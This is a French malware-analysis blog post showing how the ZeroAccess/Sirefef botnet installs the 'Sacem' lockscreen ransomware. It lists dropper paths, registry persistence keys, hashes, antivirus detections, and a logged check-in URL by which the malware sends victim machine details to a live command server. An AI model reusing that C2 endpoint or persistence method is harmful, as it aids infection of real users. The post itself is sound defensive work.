ZeroAccess/Sirefef droppe le virus Sacem

Vu sur pas mal de sujets depuis quelques semaines.
Le virus sacem via des fichiers Windows/Temp/xxx/setup.exe – ces fichiers étant caratéristiques d’infection ZeroAccess/Sirefef qui stocke les droppers des infections téléchargées depuis le botnet et qui seront installés sur le PC infecté.

Exemple sur ce topic : http://forum.malekal.com/page-blanche-sacem-t37419.html?hilit=setup.exe#p291174  où le fichier du virus Sacem est le fichier setup.exe

SRV – [2012/04/09 15:13:32 | 000,057,856 | —- | M] () [Auto] — C:\Windows\TEMP\cxxedp\setup.exe — (AMService)
O20:64bit: – HKLM Winlogon: Shell – (C:\Windows\Temp\hqvmok\setup.exe) – C:\Windows\Temp\hqvmok\setup.exe () 
 

J’ai pu reproduire l’installation du Virus Sacem par ZeroAccess/Sirefef.
Ci-dessus on voit que svchost.exe qui lance le fichier setup.exe qui se trouve dans le dossier pvhlw du dossier Temp.

ZeroAccess/Sirefef qui installe Virus Sacem
Ce dernier créé une sous-clef dans Active Setup/Installed Components.
ZeroAccess/Sirefef qui installe Virus Sacem


puis setup.exe créé les clefs Run et remplace la clef Shell.
ZeroAccess/Sirefef qui installe Virus Sacem

ZeroAccess/Sirefef qui installe Virus Sacem
puis la page : Please wait while the connection is beeing established ou Bitte warten Sie wahrend die verbindung hergestelt wird
On obtient cette page lorsque le serveur WEB qui délivre la page Sacem ne peux être plus contacté (prb réseau ou serveur blacklisté ou tombé).

L’adresse actuelle :

TCP_MISS/200 327 GET http://moxitom.com/newuni_2/universalpanel/gate.php?hwid=3214690675&pc=MAKKK&localip=192.168.1.27&winver=Windows%20XP%20Professional%20×32 – DIRECT/91.220.62.101 text/html

ZeroAccess/Sirefef qui installe Virus Sacem
Et la page du Virus Sacem s’affiche
ZeroAccess/Sirefef qui installe Virus Sacem

Le dropper est bien détecté : http://www3.malekal.com/malwares/index.php?hash=f8eeecb3c9ea0ace4e485fd1611fa1ab

https://www.virustotal.com/file/3859d838c523ce88fdadfe0c3375d5d1f98354e22a9c670cbb2ac0c4d2ca25bb/analysis/
SHA256: 3859d838c523ce88fdadfe0c3375d5d1f98354e22a9c670cbb2ac0c4d2ca25bb
File name: f8eeecb3c9ea0ace4e485fd1611fa1ab
 
Detection ratio: 23 / 42
Analysis date: 2012-04-26 10:17:38 UTC ( 1 heure, 5 minutes ago )
AntiVir TR/ATRAPS.Gen 20120426
Avast Win32:Delf-RRH [Trj] 20120426
AVG Generic27.BYFL 20120426
BitDefender Trojan.Ransom.GN 20120426
Comodo Heur.Suspicious 20120426
DrWeb Trojan.DownLoader6.3272 20120426
Emsisoft Trojan-Clicker.Win32.Delf!IK 20120426
F-Secure Trojan.Ransom.GN 20120426
Fortinet W32/Agent.VSJ!tr 20120426
GData Trojan.Ransom.GN 20120426
Ikarus Trojan-Clicker.Win32.Delf 20120426
Jiangmin Trojan/Generic.abmgp 20120426
Kaspersky HEUR:Trojan.Win32.Generic 20120426
McAfee Artemis!F8EEECB3C9EA 20120426
McAfee-GW-Edition Artemis!F8EEECB3C9EA 20120425
Microsoft Trojan:Win32/LockScreen.BO 20120426
NOD32 a variant of Win32/LockScreen.AKG 20120426
Norman W32/Malware 20120425
nProtect Trojan.Ransom.GN 20120425
Rising Trojan.Win32.Generic.12C32083 20120426
Sophos Troj/Agent-VSJ 20120426
Symantec Trojan.Randsom.A 20120426
TrendMicro-HouseCall – 20120426
VIPRE Trojan.Win32.Generic!SB.0 20120426
 

EDIT – Beaucoup de sujets

Pas mal d’autres sujets avec ZeroAccess/Sirefef :

http://forum.malekal.com/please-wait-while-the-connection-being-established-t37553.html
http://forum.malekal.com/ransomware-virus-sacem-t37550.html#p292283
http://forum.malekal.com/ransomware-virus-sacem-zeroaccess-t37538.html#p292173
http://forum.malekal.com/sacemf-police-nationale-t37555.html#p292323
http://forum.malekal.com/virus-sacem-police-t37558.html#p292327 
http://forum.malekal.com/virus-ecran-blanc-please-wait-while-the-connection-being-t37562.html#p292357
http://forum.malekal.com/sacemf-police-nationale-t37555.html#p292349
etc

Ce qui donne une grosse campagne Virus Sacem :

L’autre caractéristique étant la présence d’une autre infection de type Trojan.Clicker qui se charge par des tâches planifiées ainsi qu’un fichier dds_trash_log.cmd dans system32.

Le malware lance des instances d’Internet Explorer qui vont contacter des sites et cliquer sur des bannières de publicité etc.

https://www.virustotal.com/file/010aa20c9718abc360786bfa861b0a490e89e69a92dbaf0d09b02f0967919ebf/analysis/

Avast Win32:Downloader-NYN [Trj] 20120424
GData Win32:Downloader-NYN 20120424
McAfee Artemis!D35A50FE0975 20120424
McAfee-GW-Edition Artemis!D35A50FE0975 20120423

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 23 times, 1 visits today)

2 thoughts on “ZeroAccess/Sirefef droppe le virus Sacem

  1. A mon avis l’autre infection (le trojan clicker) est du Win32.Obvod, ça ressemble bien en tout cas à un de cette famille que j’ai regardé il y a pas longtemps.

  2. oui ça a l’air de coller d’après les descriptions.
    Ca fait un sacré moment qu’il est refourgué par ZeroAccess.

    Obtenir le « vrai nom » d’un malware à partir d’un scan VirusTotal commence à relever de l’exploit!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *